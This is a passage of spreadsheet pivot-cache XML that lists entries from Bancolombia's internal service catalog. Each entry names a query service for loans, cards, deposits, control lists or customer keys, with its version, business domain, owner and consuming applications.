    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Prestamos"/>
    <n v="200"/>
    <x v="0"/>
    <s v="Este servicio permite consultar los préstamos que tiene un cliente, consultar los prestamos que tiene un convenio empresarial, consultar el detalle y los movimientos de un préstamo en particular. "/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW1313 _x000d__x000a_AW1294001 _x000d__x000a_AW1272001 _x000d__x000a_AW0360007 _x000d__x000a_AW1170 _x000d__x000a_AW0955 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW0955001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Prestamos"/>
    <n v="210"/>
    <x v="0"/>
    <s v="El servicio expone métodos que hacen posible la consulta de información general de préstamos a partir de datos de identificación del titular o convenio empresarial, así como consultas de movimientos y de detalles de una obligación crediticia."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW1313 _x000d__x000a_AW1294001 _x000d__x000a_AW1272001 _x000d__x000a_AW0360007 _x000d__x000a_AW1170 _x000d__x000a_AW0955 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW0955001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Recaudos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio realizara las consultas requeridas con todos lo relacionado con Recaudos: la consulta de listas de convenios, consulta histórico de recaudos, consulta del detalle de los convenios, consulta del histórico de pagos, consulta de pagadores inscritos, consulta de las oficinas habilitadas y consulta de histórico de la programación del débito automático."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="ALM _x000d__x000a_SVP _x000d__x000a_GDE _x000d__x000a_APP _x000d__x000a_PSE _x000d__x000a_SVE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Tarjeta Credito"/>
    <n v="110"/>
    <x v="0"/>
    <s v="El servicio consulta información tarjeta crédito, traerá todas las tarjetas activas principales que tiene el cliente asociado a una o varias cuentas (crédito visa cayman)."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Tarjeta Credito"/>
    <n v="100"/>
    <x v="0"/>
    <s v=" Servicio que permite realizar las diferentes consultas de la información de tarjetas de crédito, donde se podrá retornar información de campos de estados, saldos, deudas y fechas de la tarjeta que se pueden exponer a nivel de los clientes._x005f_x000D_ _x005f_x000D_ Este servicio está construido para poder brindar servicios de consulta de información de las tarjetas de crédito a los clientes; esto en el contexto funcional de la línea de negocio de Tarjetas (Producto de Bancolombia)."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="APIC _x000d__x000a_AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Informacion Token SVE"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite que se realicen consultas al proveedor Todo1 sobre los tokens físicos que han sido asignados a los clientes empresas del Grupo Bancolombia."/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="MQ y Broker"/>
    <x v="8"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Todo 1"/>
    <s v="STI _x000d__x000a_AW0922 _x000d__x000a_GDE _x000d__x000a_TP _x000d__x000a_Allus"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Inversiones"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio tiene como propósito consultar la información que se encuentra asociada a producto de deposito virtual , cuenta con operaciones para consulta de tasas, listado de CDT's y detalle de CDT"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <m/>
    <m/>
    <s v="CDT _x000d__x000a_NU0014001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_SVE _x000d__x000a_AW0955001 _x000d__x000a_NU0153001 _x000d__x000a_NU0146001 _x000d__x000a_NU0149001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Limites De Endeudamiento"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Versión Inicial del Servicio Consulta Limites de Endeudamiento para la EVC Ciclo de Crédito"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="DEVELOPSOATEST _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_APICONNECT"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Listas De Control"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio tiene la capacidad de consultar a un cliente en una categoría y subcategoría de listas de control. El cliente puede ser persona Natural o Jurídica. Este servicio no contempla el retiro de clientes de estas listas."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="BVC-Legados_Clientes legados_ISBVC0011"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Listas De Control"/>
    <n v="110"/>
    <x v="0"/>
    <s v="Este servicio tiene como alcance consultar el estado de un cliente en listas de control"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Transversales no iSeries"/>
    <x v="3"/>
    <s v="Productor Transversal"/>
    <s v="Los Federales"/>
    <s v="Ruben Dario Cardenas"/>
    <m/>
    <s v="BVC-Legados_Clientes legados_ISBVC0011"/>
    <s v="AW1177 _x000d__x000a_AW1373 _x000d__x000a_SLT _x000d__x000a_AW0856 _x000d__x000a_AW1294001 _x000d__x000a_NU0129001 _x000d__x000a_AW1176 _x000d__x000a_AW1285001 _x000d__x000a_AW1206001 _x000d__x000a_AW1258001 _x000d__x000a_AW1170 _x000d__x000a_AW1281002 _x000d__x000a_NU0034001 _x000d__x000a_AW0638 _x000d__x000a_AW0922 _x000d__x000a_AW1302001 _x000d__x000a_AW1203001 _x000d__x000a_NU0017001 _x000d__x000a_AW0998 _x000d__x000a_AW1258011 _x000d__x000a_AW1258002 _x000d__x000a_AW0360009 _x000d__x000a_NU0064001 _x000d__x000a_AW1097001 _x000d__x000a_AW0683001 _x000d__x000a_NU0142001 _x000d__x000a_NU0143001 _x000d__x000a_AW1011 _x000d__x000a_AW1281003 _x000d__x000a_AW1128 _x000d__x000a_NU0139001 _x000d__x000a_NU0035001 _x000d__x000a_AW1311 _x000d__x000a_AW1183001 _x000d__x000a_AW1315014 _x000d__x000a_AW1081001 _x000d__x000a_NU0163001 _x000d__x000a_AW1151001 _x000d__x000a_AW0682001 _x000d__x000a_AW1333002 _x000d__x000a_AW1279001 _x000d__x000a_AW1277001 _x000d__x000a_AW1365 _x000d__x000a_AW0434001 _x000d__x000a_NU0063001 _x000d__x000a_NU0135001 _x000d__x000a_AW0661003 _x000d__x000a_NU0046001 _x000d__x000a_AW1480001 _x000d__x000a_AW0629001 _x000d__x000a_AW0955001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Llavero Cliente"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Consulta Llavero Cliente, es un servicio que permite consultar una llave de identificación especifica del cliente según una identificación de entrada. Es decir, que de un tipo y número de identificación puedo obtener la llave MDM del cliente o en otro caso, a partir de la llave MDM puedo consultar cual es la llave CIF. Permite consultar la llave específica a partir de: la llave MDM, llave CIF, llave CRM y el tipo/número de identificación. Y las llaves resultantes pueden ser: la llave MDM, llave CIF, llave CRM. Esta información que retornar el servicio corresponde a datos maestros de los clientes de Colombia."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="AW0748001 _x000d__x000a_AW1240001 _x000d__x000a_AW1281002 _x000d__x000a_NU0032001 _x000d__x000a_NU0021001 _x000d__x000a_AW1074001 _x000d__x000a_SVP _x000d__x000a_NU0038001 _x000d__x000a_NU0014001 _x000d__x000a_AW1165 _x000d__x000a_AW1281003 _x000d__x000a_AW1011 _x000d__x000a_NU0035001 _x000d__x000a_AW1218001 _x000d__x000a_AW0661003"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Llavero Comercial"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio: Consulta Llavero Comercial, es un servicio que permite consultar información de las llaves de los empleados comerciales del banco que manejan atención al cliente. Esta información son llaves de los sistemas donde se encuentra el empleado, tal como CIF y CRM. Algunos de los datos que retorna el servicio son: llave empleado CRM, llave empleado CIF (EM), llave MDM del empleado como cliente, llave CRM del empleado como cliente, llave CIF del empleado como cliente, tipo y número de documento original del empleado, entre otros.  Un empleado de atención al cliente puede llegar a ser por ejemplo un gerente comercial o Trader de un cliente."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="AW1074001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Llaves Cliente"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio permite que, con el tipo y número de documento de un cliente de filiales del exterior, se pueda consultar el valor de la llave CRM o las llaves Finacle de dicho cliente. Las filiales del exterior pueden ser: Bancolombia Panamá, Bancolombia Puerto Rico y Cayman. Un cliente en filiales del exterior puede tener una llave CRM, pero a su vez puede tener varias llaves Finacle, ya que, si el cliente se encuentra en varias filiales, entonces tendrá una llave Finacle por filial."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <x v="17"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="AW0842001 _x000d__x000a_AW1074001 _x000d__x000a_AW1185001 _x000d__x000a_AW0360010"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Lme Finacle Filiales"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio ConsultaLmeFinacleFiliales permite la consulta de Límite Máximo de Endeudamiento de un cliente con operaciones específicas en Finacle de Filiales del Exterior."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="_x000a__x000a_Finacle - F.E_Panama_AW0709001"/>
    <s v="AW1176"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Lme Finacle Trade"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio ConsultaLmeFinacleTrade permite la consulta de Límite Máximo de Endeudamiento de un cliente con operaciones específicas en Finacle Trade Colombia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="CIB_ISCIB0001"/>
    <s v="AW1176 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Lme Leasing"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El alcance del servicio consiste en la consulta por numero de identificación, de información desagregada correspondiente al limite Maximo de endeudamiento de un cliente Leasing."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <x v="20"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <s v="Delfin Web_menú de módulos_AW0748001"/>
    <s v="AW1176 _x000d__x000a_AW0922"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Lotes De Pago"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Consulta Lotes de Pago permitirá conocer la información de los lotes cargador por un cliente pagador. Contiene la información de los encabezados de los archivos que han sido cargados en los últimos tres meses con diferentes opciones de filtro. La información siempre deberá ser consultada a partir de un rango de fechas, cuenta pagadora e información del lote como su monto, tipo de pago o canal por el que fue cargado. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0153001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Marcaciones Personas"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Este servicio permite realizar la consulta de las marcaciones de las cuentas que una persona tiene en CIFIN, partiendo del número de identificación, tipo de Identificación, código Producto y motivo Consulta se retorna los datos generales del cliente, el estado de la cuenta (producto) y los demás campos correspondientes a la marcación de cuenta por GMF o por CATS."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="TransUnion"/>
    <s v="AW1227001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Metadata Documental"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Consulta Metadata Documental permitirá a los consumidores realizar consultas, para determinar la existencia o no de documentos al interior del grupo Bancolombia y así evitar, solicitarles a los clientes estos documentos._x005f_x000D_ El servicio está pensado para mostrarle a los consumidores información relevante sobre los documentos tales como: tipo del documento, subtipo del documento, dueño del documento, fecha de indexación del documento entre otros, adicionalmente permite elegir la opción de visualizar o no un link donde los documentos consultados pueden ser descargados, este servicio devuelve 0 o muchos documentos de acuerdo a los filtros que se realicen sobre este."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <x v="7"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Oracle ECM_UCM - Universal Content Management_AW0494001"/>
    <s v="AW1176 _x000d__x000a_AW0638 _x000d__x000a_AW1272001 _x000d__x000a_NU0001 _x000d__x000a_AW1133 _x000d__x000a_AW0659 _x000d__x000a_AW1203001 _x000d__x000a_NU0142001 _x000d__x000a_AW1218001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Mmf Factoring"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El alcance del servicio consiste en la consulta por numero de identificación, de datos correspondientes al monto máximo de factorura de un cliente Factoring."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Factoring"/>
    <x v="4"/>
    <s v="Productor"/>
    <s v="Factoring"/>
    <s v="Lucas Daniel Betancourt"/>
    <m/>
    <s v="Sucursal Virtual_Sucursal Virtual Factoring_AW0422001"/>
    <s v="AW1176"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Modificacion Endeudamiento"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio de Consulta Modificaciones Endeudamiento nos brindará la capacidad con su modalidad, tipo y numero de identificación nos diga para que producto se le podrá aplicar modificación, validando así el vector mora, calificación y marca 026."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <x v="18"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <m/>
    <s v="AW01010 _x000d__x000a_AW0748001 _x000d__x000a_SUF _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_BVL _x000d__x000a_AW1010001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Motivos Transaccion"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Permite en el proceso de compra y venta de divisas consultar los posibles motivos de la transacción."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="DEVELOPSOATEST _x000d__x000a_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Movimiento Cuenta Ahorro Deposito"/>
    <n v="110"/>
    <x v="0"/>
    <s v="El servicio Consulta Movimiento Cuenta Ahorro Deposito tiene como objetivo realizar las consultas de los Movimientos de las cuentas depósitos (Cuenta Ahorro) de manera genérica, de los clientes pertenecientes a la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <m/>
    <s v="AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Movimiento Cuenta Ahorro Deposito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Consulta Movimiento Cuenta Ahorro Deposito tiene como objetivo realizar las consultas de los Movimientos de las cuentas depósitos (Cuenta Ahorro) de manera genérica, de los clientes pertenecientes a la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Depositós"/>
    <s v="AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Movimiento Cuenta Corriente Deposito"/>
    <n v="110"/>
    <x v="0"/>
    <s v="El servicio tiene como objetivo realizar las consultas de los Movimientos de las cuentas depósitos (Cuenta Corriente) de manera genérica, de los clientes pertenecientes a la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Depositós"/>
    <s v="AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Movimiento Cuenta Corriente Deposito"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio tiene como objetivo realizar las consultas de los Movimientos de las cuentas depósitos (Cuenta Corriente) de manera genérica, de los clientes pertenecientes a la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Depositós"/>
    <s v="AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Movimiento Depositos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio ConsultaMovimientoDepositos V.1.0 tiene como objetivo realizar las consulta de los Movimientos de las cuentas depósitos (Cuenta Ahorro y Corriente) de los clientes pertenecientes a la Banca Personas, Pymes y Empresas a través de los diferentes canales físicos y virtuales del banco. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Depósitos (Cuentas Corriente y de Ahorro) Personalizacion_ISBVD0001"/>
    <s v="AW1272001 _x000d__x000a_NU0010001 _x000d__x000a_AW1218001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Movimientos Bolsillos"/>
    <n v="100"/>
    <x v="0"/>
    <s v="Bolsillos Bancolombia permite separar los recursos de una cuenta de ahorros para mantener diferentes ahorros en bolsillos separados con una meta en específico, por ejemplo, ahorros para viajes, salud, alimentación, transporte etc.  El servicio ConsultaMovimientosBolsillos habilita las capacidades de consulta relacionada con los movimientos que puede tener un bolsillo en particular, por ejemplo, adiciones, retiros o transferencias."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <x v="2"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0021001 _x000d__x000a_NU0146001 _x000d__x000a_NU0149001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Movimientos Tarjeta Credito"/>
    <n v="100"/>
    <x v="0"/>
    <s v=" El servicio Consulta Movimientos Tarjeta de Crédito tiene como objetivo realizar las consultas de los Movimientos de las tarjetas de crédito de un cliente de una manera histórica y los últimos 3 días._x005f_x000D_ _x005f_x000D_ El servicio permitirá consultar por el número de la tarjeta de crédito de forma completa, y con los últimos 4 dígitos de la Tarjeta de crédito en el caso de que por seguridad se deba utilizar."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <x v="15"/>
    <s v="Productor"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="APIC _x000d__x000a_AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Numeral Cambiario"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio Consulta Numeral Cambiario permitirá realizar la consulta de los numerales cambiarios a partir de la identificación del cliente, con el tipo de persona y transacción. El proceso para la compra es el siguiente:"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <x v="0"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="DEVELOPSOATEST _x000d__x000a_NU0163001 _x000d__x000a_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Obligaciones Sufi"/>
    <n v="110"/>
    <x v="0"/>
    <s v="El servicio ConsultaObligacionesSufi permitirá a los consumidores consultar las Obligaciones que tiene una persona con SUFI. Se nombra y se deja abierto el servicio como “consulta” con el fin de adicionar las capacidades que se requieran para consultas relacionadas con obligaciones como consultarDetalleObligacion etc. "/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <s v="Servicio Web Obligacion Sufi_AW1082001"/>
    <s v="AW1209001 _x000d__x000a_ISSU20003 _x000d__x000a_AW1097001 _x000d__x000a_NU0093001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Obligaciones Sufi"/>
    <n v="100"/>
    <x v="0"/>
    <s v="El servicio ConsultaObligacionesSufi permitirá a los consumidores consultar las Obligaciones que tiene una persona con SUFI."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <x v="11"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <s v="Servicio Web Obligacion Sufi_AW1082001"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Servicio"/>
  </r>
  <r>
    <s v="Servicio"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Obligaciones Sufi"/>
    <n v="200"/>
    <x v="0"/>
    <s v="El servicio ConsultaObligacionesSufi permitirá a los consumidores consultar las Obligaciones que tiene una persona con SUFI. Se nombra y se deja abierto el servicio como “consulta” con el fin de adicionar las capacidades que se requieran para consultas relacionadas con obligaciones como consultarDetalleObligacion etc."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
